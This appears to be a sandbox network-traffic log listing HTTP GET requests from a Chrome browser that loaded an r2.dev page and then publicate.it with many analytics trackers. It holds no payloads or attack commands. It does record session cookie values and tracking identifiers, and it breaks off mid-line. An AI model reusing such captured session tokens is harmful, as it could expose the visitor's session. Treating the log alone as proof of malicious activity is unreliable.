Source: global traffic HTTP traffic detected: GET /?sid=bElvO73dOjE4ZMqj&data=eyJnYVRyYWNraW5nSWRzIjpbIlVBLTUyNTk3MDkwLTEiXSwiZ2FNZWFzdXJlbWVudElkcyI6W10sImdhQ2xpZW50SWRzIjpbIjEzODE2ODA2MDYuMTcyNTAzNDU3OSJdLCJjb250ZXh0Ijp7ImxpYnJhcnkiOnsibmFtZSI6ImxmdHJhY2tlciIsInZlcnNpb24iOiIyLjY0LjAifSwicGFnZVVybCI6Imh0dHBzOi8vcHVibGljYXRlLml0Lz91dG1fc291cmNlPXB1YmxpY2F0ZV91c2VyX2V4cG9ydGVkX2VtYWlscyZ1dG1fbWVkaXVtPXJlZmVycmFsJnV0bV9jYW1wYWlnbj1wb3dlcmVkX2J5X3B1YmxpY2F0ZSIsInBhZ2VUaXRsZSI6IlB1YmxpY2F0ZSB8IEhUTUwgRW1haWwgVGVtcGxhdGUgQnVpbGRlciIsInJlZmVycmVyIjoiIn0sImV2ZW50IjoidHJhY2tpbmctZXZlbnQiLCJjbGllbnRFdmVudElkIjoiNjhjYmY1NTkyMTJlYjkyNyIsInNjcmlwdElkIjoiYkVsdk83M2RPakU0Wk1xaiIsImNvb2tpZXNFbmFibGVkIjp0cnVlLCJjb25zZW50TGV2ZWwiOiJub25lIiwiYW5vbnltaXplSXAiOmZhbHNlLCJsZkNsaWVudElkIjoiTEYxLjEuZWQxZTM0NDk3OGE2NTFjNy4xNzI1MDM0NTc5Njk4IiwiZm9yZWlnbkNvb2tpZXMiOltdLCJwcm9wZXJ0aWVzIjp7fSwiYXV0b1RyYWNraW5nRW5hYmxlZCI6dHJ1ZSwiYXV0b1RyYWNraW5nTW9kZSI6Im9uX3NjcmlwdF9sb2FkIn0= HTTP/1.1Host: tr-rc.lfeeder.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /c/hotjar-2431713.js?sv=7 HTTP/1.1Host: static.hotjar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/mailchimp_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
Source: global traffic HTTP traffic detected: GET /images/yahoo_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
Source: global traffic HTTP traffic detected: GET /images/macOS_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
Source: global traffic HTTP traffic detected: GET /, HTTP/1.1Host: pub-e1c6f3d85d51402790227684363ac52c.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/send_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
Source: global traffic HTTP traffic detected: GET /images/hubspot_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
Source: global traffic HTTP traffic detected: GET /images/more_clients.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
Source: global traffic HTTP traffic detected: GET /images/features_review_icon.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
Source: global traffic HTTP traffic detected: GET /images/adobe_review.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579
Source: global traffic HTTP traffic detected: GET /images/Trustpilot_logo.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /td/ga/rul?tid=G-JL3QGDSQZ4&gacid=1381680606.1725034579&gtm=45je48s0v874630860z8850968419za200zb850968419&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=417783928 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /td/ga/rul?tid=G-8ML5ENYGMT&gacid=1381680606.1725034579&gtm=45je48s0v887450065z8850968419za200zb850968419&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=1212565528 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /tag/kuemlmuzvn?ref=gtm2 HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /js/profitwell.js?auth=c61691493c428b337ecf0f72fa2f9c82 HTTP/1.1Host: public.profitwell.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/template1-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/template2-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/adobe.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/microsoft.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/home_banner.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/groupon.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/logo_white_text.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /js/webflow.js HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /alvis-onboard-1.0.8.js HTTP/1.1Host: assets.getalvis.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /track/ce/?project=publicate.it&instance=woopra&meta=&screen=1280x1024&language=en-US&app=js-client&referer=&cookie=sB4hScRiWkjO&event=pv&timeout=600000&idptnc=eNCnXL5OXflh&ce_campaign_name=powered_by_publicate&ce_campaign_medium=referral&ce_campaign_source=publicate_user_exported_emails&ce_url=%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_title=Publicate%20%7C%20HTML%20Email%20Template%20Builder&ce_domain=publicate.it&ce_uri=https%3A%2F%2Fpublicate.it%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_scroll%20depth=0.17704470037087644&ce_returning=false HTTP/1.1Host: www.woopra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/template3-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; 